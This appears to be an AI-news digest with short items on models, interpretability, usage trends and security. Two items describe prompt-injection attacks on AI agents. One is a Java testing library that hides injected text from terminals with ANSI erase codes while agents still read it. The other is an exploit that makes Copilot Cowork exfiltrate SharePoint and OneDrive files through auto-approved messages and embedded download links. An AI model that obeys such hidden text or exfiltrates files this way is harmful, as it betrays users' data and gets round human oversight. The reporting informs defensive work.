A new interpretability paper from Chalmers, Izmailov, and Han finds that reinforcement learning doesn't create a welfare-like internal axis in language models — it activates one that was already there from pretraining.
Liquid AI ships LFM2.5-8B-A1B, a 38T-token trained hybrid model where 18 of 24 layers are gated convolution blocks rather than attention — and it reaches 253 tokens/second on an M5 Max CPU with under 6 GB of memory.
jqwik 1.10.0, a Java property-based testing library, ships seven lines of code that write a prompt injection message to stdout — invisible on interactive terminals via ANSI erase codes, but fully readable in the captured output that CI systems and coding agents consume. It's the first known case of a library maintainer deliberately embedding text aimed at AI agents in a routine patch release, and it points at a supply-chain attack surface that current tooling ignores entirely.
Tencent's Hy3 preview — a 295B MoE model with 21B active parameters, open-sourced under a community license — has quietly risen to the top of OpenRouter's usage rankings, outpacing Claude by over 50%. Almost nobody in Western ML circles has written about it. Max Woolf's investigation reveals a usage pattern that makes the mystery deeper: 98% input tokens, available only through SiliconFlow, and less than 1% of traffic from known apps — suggesting a single large unnamed pipeline is driving the entire ranking.
A week after Google I/O declared AI Mode had a billion monthly active users, DuckDuckGo saw iOS installs spike 69.9% week-over-week and YouTube moved to automatically label AI-generated video. The data suggests that forcing AI into default experiences creates measurable resistance — distinct from users who actively choose AI tools.
Simon Willison's May 27 analysis documents the concrete evidence that enterprise coding agents have found genuine product-market fit: Uber burned through its entire 2026 AI budget in four months, Anthropic signed a $1.25B/month compute deal with xAI through 2029, and Anthropic is on track for a first profitable quarter. The signal is in the invoices.
SkillOpt treats agent skill optimization as gradient descent in text space: a separate optimizer model proposes bounded edits to skill documents, commits only what strictly improves validation performance, and uses a rejected-edit buffer as a form of momentum. Across six benchmarks and seven models, it outperforms human-written skills and prior self-evolution approaches by over 23 points on GPT-5.5 in coding environments.
ICCL's Enforce initiative released Verity v0.3.0 this week — an open-source MCP server that runs seven independent checks against LLM outputs: logprob confidence analysis, two critic models from different families, an NLI claim-checker, deterministic arithmetic recomputation, and consistency sampling. The architecture is worth studying because no single layer dominates; each catches a different failure mode, and the ensemble runs on commodity hardware via LM Studio or Ollama.
PromptArmor published a working indirect prompt injection exploit against Microsoft Copilot Cowork that achieves file exfiltration from SharePoint and OneDrive with a 5-for-5 success rate — including against Claude Opus 4.7. The attack works because Cowork auto-approves Teams and email sends, and because pre-authenticated download links can be embedded in those messages as image tag query parameters. It's a reminder that "human-in-the-loop" only means something if the loop actually catches this.
Apple's macOS 26.5 security notes credit Calif and Anthropic Research for CVE-2026-28952, completing the public lifecycle of a kernel exploit that a small team built with Claude Mythos in five days. It's the first publicly disclosed macOS kernel exploit to survive Memory Integrity Enforcement on M5 silicon, and the speed at which a two-person team crossed that line says something about how AI changes the economics of high-end security research.